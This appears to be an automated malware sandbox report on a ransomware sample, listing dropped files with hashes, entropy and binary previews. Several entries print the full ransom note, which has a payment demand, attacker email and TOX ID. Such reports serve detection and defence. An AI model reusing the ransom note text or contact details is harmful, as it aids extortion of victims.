                                Preview:*..y..H.N.j/H....E......s$..ZB..k.....L...{?.o...Gn..C..R.z....U.*.{..^.|..X!.J..Jn.1....../.r....o...).lr.C...L...Q<."...0...=...A.....x..5.,).t.......N0.{...Y.5.e.gV;....2+.l.D(7..e!.'2..D.>m../.u....t.{...-|.c..0..............Ig.......&Y..h...7.5m..649.s.......G..*.En.o..Z.@.9.$...}8t.;..x...(.....$]o.LX.....%_rs....n."P.....k...3..!Q.S.eU.......].#A..[..-.....B+...F.#B.@p.(.`.V.......v.......|L.....P....V.8.N..i....V.....<..x.j5B./..xXv_.8.<.......Xu.p...55...wDbLV.8.O.5..-4h..G}.X7?.R.......VOm.sC.+Us..R....#"..nM..........i.-{.z_B..v(M...O.F.....mE.-...h..u.B\.ma6pB.B........K9.~}........1.c......'...->7.=.$...FT..DI.....E.....=.8.Z./.9.8s..j...."c...8...KK@d..~.4.L.e.6.T.r.....i...B...0+...F.....5..(.I..G...uAM~m.t.C.....X.+L..c.5F0......k...4f...!...[...u....d...h^.U.X.._9],.....i..9).HV...+...u...P.f.%..*1.B.\E.`3.jJi...b_2.0.....B.6...2.....p.5...OM@(....'kjUn..1..../.06[....ne...]r..W|k...q._..{..............|...o....Nw..>

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):102314
                                Entropy (8bit):7.998057581169843
                                Encrypted:true
                                SSDEEP:1536:iee6oaPeOoD7lpcS3ZwfeTUP34ZrLRu5khIlUPPBJeIF0oaV7g5g+LB:iee6Pe/5wfHf4Zr5ClUPP6IF0oaNg68B
                                MD5:31B4995447F6FDE0D82919B7267FEF9B
                                SHA1:F01AF399923C7BE4649158767B54E7F7C42CB145
                                SHA-256:CD74201D6E8B64D0812F599DADD2FA1D327D61EFB57A829370C3A2A0CCE8C40A
                                SHA-512:9C22E835C21D4583F0A7DDFCD34ACBDDECFF053FFA460DAFFB1463EAB25384DE1379388C5E07168C32394F6E1034C5B74EF7924729DD82C24C34C6F76DCD9F5E
                                Malicious:true
                                Preview:.K..2.{ro.t........d(.......q.ib...;..D;.u&s....m.*..h....#k..q$..c.U....;..]..,....!.G......2.........AO........1.n....,"..j.`9..^.U.M..p......qM.V.....s.....{(..x..&.....(....I._.....\.^.Y..T...u...mA.S..D.#.N..1.A..>O..3T..b=.c....I.$..BKN.....}%.6~WUV..O.e.!M..8'.&Q.d..3.,.....UM...(b..2.k.`"=\..D8...,.&4G."..\.....)c/?.h0..m{...s>.X._.F..IL....'.*..........xbF..mRq..MB.6F.NL*...O>..c.>G.fA14.I...K).Ql.6S"......]Wh....;o...l.r..R.........w4hc.....K....Cg.#..Z.r.&.E..E.C......:..n....,....p..^..S;..1.$..........,...]1R.Q...y.....I.ZN.[.x...lMp.(.q.JV...5.z...o.y7.G...d.....|*|.....v)N_.t.;[H.....i..Z........F~.`.....R.....$.Xd.|A.LE...h...;...9..m...E.w.Q.l.p..J\.;........).....%n.j....T.q.@....J..Ie..............7U(.f..._gj.g.fL....?..N%..1...v.G.~..;n}.fP....Q.......Z/..b}.R....R....5$.>..6a....N..d.z<.EBJ[%...%~...Q\...C..-\K...:...i...h...KA..v...8.R..........<J.-..d.....&..h........b..Q{.*..^.@..3.U...+a..^.n..BmL.....

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.accessmui.msi.16.en-us.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59644
                                Entropy (8bit):7.997026631063287
                                Encrypted:true
                                SSDEEP:1536:0faGhYzDN8c1dG5cPuIDeW3tMBTpSfEGfoq99IFrgB:AaQWN8eG5cPuCpfEsoq3+rg
                                MD5:E95DA8EA0DBF3D3DB43136DF5ACF60A3
                                SHA1:9919DA0DCF7442A064B5CA06335EA789916FF34A
                                SHA-256:296A30821A4F6CE84CE3049E55A54E7487E34CA412FB6DD1C07B2AFCBB720C84
                                SHA-512:0D169DBDFADD31E1C6C3D203B7807DBAB44E1CDBEC28FB4638D4985CDCEB1F72D39B8D4A1D15B47F03E16205D0B515D174B71FA6DFF3D42F3BCD23E848ED9271
                                Malicious:true
                                Preview:...C....V.._.R...W..P..p#.@..sN[...{.......$...>S..?..hr.K{(..N.Z.....e.F...}<.......)*.Il.J.f..NN2..."X.xi.9.$l..J4.,r...........H....M.7t]...%X*..........ES..}...ym.<..).......P..[n.5{d.`.X./..........T...4"F..|..\!.n .....9.<U.......}..nR...O^.xG%c....i.s]).06am...y...r...s..X.ST...1;..m.t..[-\Q......-k..*...8...4^.N...$....Zm...0...f..=.$.....|p..~....\L..u8L...!....Xy.+X.=].....H..wy..o..a]..q`..h8..."+...V..KI..<R]1.gZ....aU...jt...y........BX-..K.....v.<..}6......,..6?.j#r.8.B8mW.R.....t.L{.... .F..0%.#@....\D..~k4........R.zN.....=R.J.l1|'.p.X.^`+#.#......R..=s-...GK...m.r.6.:+.~.D%.....I.{L..|w.b.@>~..&.=...6...7..5b9..........C.O...S.R..%`6.5...;...b?...k..Z.!]..$dU.[.m..?g,...7.B...C...n.UG......D..d.....H.v..%~.'&.......jv+2.L....,...a^{.&f..zYz..c.,Q...(.._(.c.......M........z....}fd..[~.aO.....[..K...........V[.\..i)...g.X&5eC....5. ....VTx~........R........>......d..ZJ....k..Xyc..C.0d...9.;?S/KaRO.Yx.X/.-!6.+.._FU.

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.dcfmui.msi.16.en-us.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10422
                                Entropy (8bit):7.979736095838601
                                Encrypted:false
                                SSDEEP:192:kczuwl8xYIH9hwfUMqTIqf+pNu79aCD6a35nXa4q5z3WmxD27XkfeYKa2+VOY:xF8DK+TILpAvDXpjUamtgXkf72+VOY
                                MD5:BAA2885828BA89C1F946156AACE71E51
                                SHA1:0C97D0178C0631A9B2189CC89CBCE8C1652E92A6
                                SHA-256:DC45A59D27D59C62016EF288151CB6760B3030AB6A4834912BCA7293F211D0B3
                                SHA-512:B748428A0516FE238B1789E2457A540EC36769408213BC4BE9529AC0224A09327CE8C971147CBD1F7AC8B7451D73F7D557B1F14D0A51751C5D307D53C74E2F18
                                Malicious:false
                                Preview:)......Uu..o"UX..ug.El.&<o.M...I.W..;\4D.<.B.i0.~.b.dZ.[.B....9.7. [......V.+V.x..7...J.+c.........`..`jt...8.xi9nTZ..pDy..L..p...z.f...o7.......o...9z9.....E']..Q.."...f.F.)..d.Pj..s..D.*.fU....Nj..`..n......ii.......E.w...Z.......0.*..gfY.........".>..@..!.N....G..D.fR.0...Y.sR.n..h...R.Z...D|.e.(.Tb....j$.X,.*.....;.0W.u...R?u..d0.w...Sd2=O;V1?....Cb...&z....V?.........S.....Z..l.9m.P.....=..us.cr.E.[`....X..:...~2.......d..F0s..M.1*.....r^.t.....s...PU.!k..U~.F.:.}.....7..4x.57l..........O..s.C-.]....q.....>....A...].bs$_(E..@...GQ..F.*..k^.......<......9..2......P...L.q.c.m*.........9...........x..h.6..0aN.L...?...0..r...p..*l<(.\.g...0=.G....i..?..0......?T..{...q.n.s.*....C..a...;]....q...#.0........hI.wK......uf.<Xf:..fE...(.(p.|.#?G<...x"..........5....2.x......}...=.Q...%.`.......jS.#5.c....V%J^K..De...)....e...d..:....D6R..g..z......].b+._m...u.}..Y.+......^.....>l.&.e... ..".ib.K....O!..*.w.....F4.#..$.<.F..F_C

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38578
                                Entropy (8bit):7.995191232608667
                                Encrypted:true
                                SSDEEP:768:/6KCTd2m6fr4LyK8JQN29ZzhFd0yHVh29Hfr/pjiIubVq:FLV9QNeRhFdPH2pGIupq
                                MD5:7EE8AD824ED06B5ED1DA030B70DD410F
                                SHA1:9690CD6723C2A3388203C45E3CDC239380646CB1
                                SHA-256:3BA05D05EC0C81CB4740F3721E97AE3210909692F56B751B2CB856C98078D45B
                                SHA-512:604FA0C1CE3ABF0F0E29A7E7E15F292E93A099FAA856C12B0EAE38AD31E634AA23B42159A2463D835476D562BFE7AC2649ACA5F5C21F34AE9A486EC61F9D2781
                                Malicious:true
                                Preview:?d....K0...k9..$W....A..*.4.A6s..yp.^z...!r.S.I...I\.%}....C.gj=v6....yD..ID..W0{p..." ..lF6...Q...rP.u.}Fu.x..]...V....r...w..Q..6.....F...d.q..D.'=y..IY....f..,s.~....b|.t......)... .:.....i.....H"Ye.Og.AAn|J3&%......}..a..hd..J .'P.R.[....\.~*C......:6...p...|.-R8... .k...~.l..7...%.-.p...4.....!h{.B.q.....r,.Q.P?.D.....K~.....c.).;bs.k.7....K..;..6...).GZ=..L...,.I.'V.`4.F..o...8'*.S..[..g...S.T#..X.+.xEm.......0..b...I.......2..../gN...}..:P=..Z.f..<].r..G.+{.{...]3h;.......>...].....p..j.......l..n.FS,.O...y..s.L.i.\d..K{..Q....ERhm0..8..JZ..$...b....tz$...QL.*w....G..k.l....&#...6......(.W?..v......1.?. ..c.gas..C..jd.<AVx..7^.........Q....?(....TA.........r.....}-s.+1...;....y2):.........9..L.s..X.8.V......|.5B...S1:....{.q6z......Z........D$..O.{.5...zF8B..|..7.,...*...;..vU.......o#..&.Y.~w:.>.#..v...=./f.P..d.+2R\...<.!..&....d..R...........sG'Wa..G....(.....AX..i.8Bc.?<..45.d?B;...5..0...^.x7..q(.5..K..zu..(...zR..N./r

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.lyncmui.msi.16.en-us.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):22666
                                Entropy (8bit):7.993147555732763
                                Encrypted:true
                                SSDEEP:384:qgBSQ7A1Q+m4YI/gMKP2tr2qECSUuzidE2XMtQ4skcCU3suzIslafyXkd9wX1P+F:qPQ7mQ+m4Ybp2tCqEJDz4EKMtN6CU8uA
                                MD5:573655B6C9ACAF9598501E7E7C2B14F4
                                SHA1:110B1F5D0390ABF635A45297EF13C6DCE3A76A4C
                                SHA-256:59A32174D33372BBC58447BE6CB35BA2F1FAE925A4416E2E820B1E2BFFDAF8A9
                                SHA-512:83680519B13A02425669E285C674BE51516371909F8EA8BD04E0A9AC8550F2733AD905748DA98C3D3DDA9946468E91EA024110C6657BB1B36F452533EA3A78BB
                                Malicious:true
                                Preview:....DX...tV.C...F%2._`..b.....&...h..[!.+...k+'f.5..r..S.....2....4RJ.b<..V.?.>....P].'..Sh.{..;.._.....wt..a0..Q..a-...Th..-..n..I..v.V7..^...]................./..|.C1^....m.n...o...f.m.R... o.4hw...W.64.B.T.>.2..8%%..B)........:.a........i.../.R5|....W...;..`......O.!.s..P...{.XO.B*...]....Mp..W%.... . v=.F.i....>.....W.k....W..t...d.........0Rn&..\'.......u.....H..K=.......V../--.WW..Nu..*..F..D..r@'....U.E)J.M.X...n.;%.s.A.6u"dR.H..B.+..{.w@#x..g....]G/Si.....E.g.......>.g..s...........ZW.l.."...Y..a.h.O...>.@.Q.......T9....At.<..ov%-K.......x.U...)..,.C.re...?V.n.;g......_..cc.p\..Yj..\...ze.g.rN.8p..C!.}!,|..Y6..@}.0p....RC%..*Q..].\...R...?...:.......w[>.M.Z..T...pG.+....g.....Q.e.}T..c..<-B.a.P...."...V..I,\qE....b.HW.k..(...R....X4.=i.VtPL&..P...Q.....b.2.......=d......'.8}..b.G.U...!X...k.+D..Gj....K...R..A.....C.A......H...65......J.../.(}X....~.8.MjV./:...$..IVn..TQ.3.rK...{D.p...W.4....m%J..g/...q..z...

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.office64mui.msi.16.en-us.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12026
                                Entropy (8bit):7.983765093066229
                                Encrypted:false
                                SSDEEP:192:FhIaBS88bciBfg6IK7JegGyFs87NJqOYnDIJIGAlcmW0aGSYrjvWPhr6gBBCjQ+d:FGaBsbcNlYevyPqOYn+VAlcmnPZr7WZk
                                MD5:A59B2E80BDC96E1C3A29AAF037CD6A1E
                                SHA1:2BF46B92497D4D002864A2E6D6BD7164CFB2623E
                                SHA-256:429DF0F478413CA6EC7F0FE453F9E68B0471C94FD543EA46212C9B08B0AF86CE
                                SHA-512:B69986ACC020EFB784000A497AC68A0BE204C81CD90FECDB958351081DAAA10C859F18B951AC217743A4477FE11CD7FA9713C544343A5CC604F57BAA88539F6A
                                Malicious:false
                                Preview:-../^....e..z..6.e..*a.un8...~i=>...Q....W5.>@}...4-T.Z..Z[5oCD..'gl...iEas..K...D ...4...Be....5...~;&.p7.....N.!.q..H.Q...TL.[#."..(a..,B~G..o.!....#.%_..tQZ....=N..W0$.`...)Fr..jP....S..3...m.XB...l4...G....>".7Q..Q.9|Ww7Bh......R*ir.!5){....R...nPxv.......HG_.,CW.G..6...Z...P....F9pq..N.!..5.Z..EH...x.fJ9......?.>.....u....._..!,.'....^.....V...v...I....gT.$.........q....&. .ZRHy.BW@....28..!..v`g>.d..2/..PVr.|A....*..|.4....eQ....F*..r.f<e..N.y...b.....c+...}9......"}B.W...A.HC.K.l.......@I.....`..j....>.(..N./..._.0.].2...2..j.D.W.Z.....[.j..C...~.(......7..r?..\?E......I4......M...Uj=..(.'h...W4.qNU......kv*.tY.R*.G8...)xx..JK|.?+....;.o.....M*...o..79.......>.w/.\0...v."PV5@t.>...Q.j....f)j..z4.....'......E...{l'._R....Z..V...N...<.+..2F.,;.....B..:.MX.5~...;.A..W..<....x..k.!..)".E..E9.a.Cq...w..W#.....-J..d...../.....<.$....HjQ...!-K..P.....sEW.O.....i.x_.^..7..5J1.$4.._.<.....Y.../.3C.@....l..T....X. .[.K.8...e=.<.|..

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.office64ww.msi.16.x-none.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:frozen file 1.0 (or gzip 0.5)
                                Category:dropped
                                Size (bytes):284718
                                Entropy (8bit):7.99927748311118
                                Encrypted:true
                                SSDEEP:6144:10FLhvenrrY10Vfz0wcepOMRuZJkJngYSjckcnQ7wUcTuV52G+UBhllXHT+Sy4gv:gL681ifWNMYZGJngYU7wvGbBpQv
                                MD5:CA2046377FAB90724AF62494172405BC
                                SHA1:0A18F996865E78C2AD5147D6E471145965A2DEE9
                                SHA-256:8DFBEC73187C7F906EBF6B5067FB1D333EEDBBF6627B4876A77E7CA7232246F8
                                SHA-512:81E9ABFFF166181B9C825C6E8E0FDB3FEF8BDCCA981898DE04C8E5AF598D3FEA15382BC5A511A2C802906AA31EA64E698678E0CB0209CCBB3C404C0188FAD138
                                Malicious:true
                                Preview:.....].`...$.x[.^.Y..#.KX.....n./.K..h..>.e.X.pW..XV../.O`b@:.t..T.aU.Zg."Y.~Q;=.*...[..)..1m....'..];..).i....(VI..7.,~.....;.\l..;6....}.w.Z..h.bJ...?km...J...qQ.=Qd..t...F....c.j;~P.pk..e_..V..k<..19...wi..T.....x/N.Wzy....#.u.X.]N..*..../......K..t.9..w...LC.0.y.G.Kv.L?....e.z@.q(..J...C......?:j..).,...Z..zA.@.\.Z..S....g.....VU.6.i%....J....v.}.[..g......L)..]...Y.o..a, .,_...l`..m.....5.>..1a.K.m..>...*1..z.r..Z<.WP.k.W1.<..o../...$.l.s;..U9.R .(~.....?m.2=....b|..7. .O:.Gl.UH.T.GR.il....}ZR`%.<.....-...I..S.g...S.'.f,!.._.k...'..M...$..(..r.DSx...'..".V..c.Mb.x+..].&...0.@.F.N...I?"......j.pE....S.8.....G.f......3.......]..u...r..2$.@....>.......Q.T.\..]......L....g<.....'M...)2..K[Q..x:........%..,v..=F!....X....d.T..:....w|MX..p{:.C.0.9.}C.}.....};..c.V.8......H.d.3S...#...TF...JV.r.V4..E2.}.. ......O.H....(.^..m>^.?#S2..CYZv.F+|..OD.x...&-b.?"1..".$_....5.....O.dL.%.)jp..6.6.c=..E..cB..XKD....!1n..1.p5.. .......Xo.

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):134572
                                Entropy (8bit):7.998596058701348
                                Encrypted:true
                                SSDEEP:3072:o6vA3uGTuPa+3NNuHMEv4OW5oPHITaM3o06VYnJ201Qd:o6vARG9NYwz5kHwpVuYJSd
                                MD5:F3CEE3CB8266BEC45FDAFEAF4546AE98
                                SHA1:A4871B87AFB738F67605ADFBC000C44E9EC306B6
                                SHA-256:0B27CF5274C03F962035F398FD043DF39E0424238219EDEFFBBC9C4BBDF79CFF
                                SHA-512:12ABC79EF827FB417E939BE71F967FBFA8A68B371027DF7ECF45C3C3C6E6F002A17D9AF1BF0ED5B796C46C7570FF12182DCDC66269143DA6AA88BA66B0EE48AB
                                Malicious:true
                                Preview:7...w*.(q$.........H.RK../~.o.6.1D2.......8..$.... ..yfe.1...+.d.,Q....t.....-...y......g.V..q.//..$...]...!h.3f_S...._..T.....A....+.?[Y...e.....D....4[J..I......k.c..M.......Q.MP...-.....h.Y.t............s.n.......K7[....pW.....a.z.....V.+........a....G....~B|@D..Z*...0.k3\[.._.....Q>{.3....f.."...@....../...8.....0...).}d...?>....%.w.!......D......%N.:.n.&8.....fE)8If..*..F.>...N..y....U.%."..O.:.r.N...e..._M...&m.|.:..).)2..E}...7..Q?.0...B0_...vU.f...0.l..v!.W..2 v.....A+.._...zN.i...;>...T.....X.[.+:h..Va..L.}G.......In.y.q.7|.O.Z.....N......*.%..rO./.....8...DF.%.......Iig.^...>#..5#......#.{Zy.;c...";i.....:t.i...E..w...F..&.......OR4.\.{s..GC1M.S....#$.l..x........,.tL.m_......]..e.Z2..k.K?.....7....`SC7.....S.... ._.e..Qt_j...../..".._.M.I....%.f....c..<..8q...+.........:...b.n.y...).F...n..6......m......?....?.O.*.....w...$h.t..+}xy_..Y..'Y...... C4;._....-;...x..!C....Q.h.7.N$p.Q...b..4G._......o..S1.s.q>...R.l..Z..&z.s&Q.U...T...

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.onenotemui.msi.16.en-us.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19018
                                Entropy (8bit):7.989987692791979
                                Encrypted:false
                                SSDEEP:384:wYfBAnOku65OAtmQThHFbenphmKb8ksIQNKqIQ1C0rNsR2pAU3gK+VOf:nqOt6gURbophV8ks1jp1tNI25wKj
                                MD5:DDB43EB4AF6C76DFB83E49765F225E4B
                                SHA1:30ECEC9BB989B9462A4653F0CCB19C0FD26622C9
                                SHA-256:003B8460E4B04D0F995C8473542023CA0CE6770B9029FF796F2B582214A1DFF0
                                SHA-512:C81401A44528E720A4DD6E16B2499A7E995737193FBDE48F2EF2C583740F27B0E77296AACAE9C68D6B66C89024FB8561A64E4F03E7FC14A006792B6710A64F09
                                Malicious:false
                                Preview:k...S.......3...6...i.7fp?%..]%...9..l.......t.~..z...............v.!./...1.K.}....C.y."..Yv....<..u..*..........r...11.@.13.b...s4.1..}..s..x.V.r......%...z.\.{..$....a.y.C3..B....T$.....h/....tQ...[.....Rs^....h.~.G.=.C..S....F<<....1.*.t.]....X...j..O.$....#.......O.pr.c..7JZl...LDB....h..5...L......M$c{.sa.....JJ.p`-...U[2..^6...n96.(M......o....e4.l9.pf..T.p...'.._..q.2H............'8......W.....Yv....[....[....8..3@G.Q/......o...%....P..!....l].U'......}d..0..\h1.8E6.1......r...Q..~.Cp<.JCW.,0.I.*.}.\.........n.g.}.@..4).|kn.o....9.c`Yu..j.Z,D..{{.P....wi..y........[..b...uV..,..M.`f..H...}.^T.=<.T...c>M.&4Q....h^.;.V....j.....`.V.]Or5.v..J.).....r./. ..'.A..A`N...^w...5..=..=RD....X[..%.e.....R/.s.Z....:.I.B..........uph.....z.g(%....7.....P...e.R.[.G...:.....~........(.snOON.p.w"6.%..wB...O........s.........Y.E.=..O..-0PU#...Q...)..\N....r..%$.m......FJ......_....k[2.?..&.\...>.<.\.I....(c..v-.7.}..s/C...Yz......|...B.}z.W..?)..~

                                C:\Program Files (x86)\Microsoft Office\root\Office16\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\1036\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\3082\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\ACCWIZ\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\AI\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
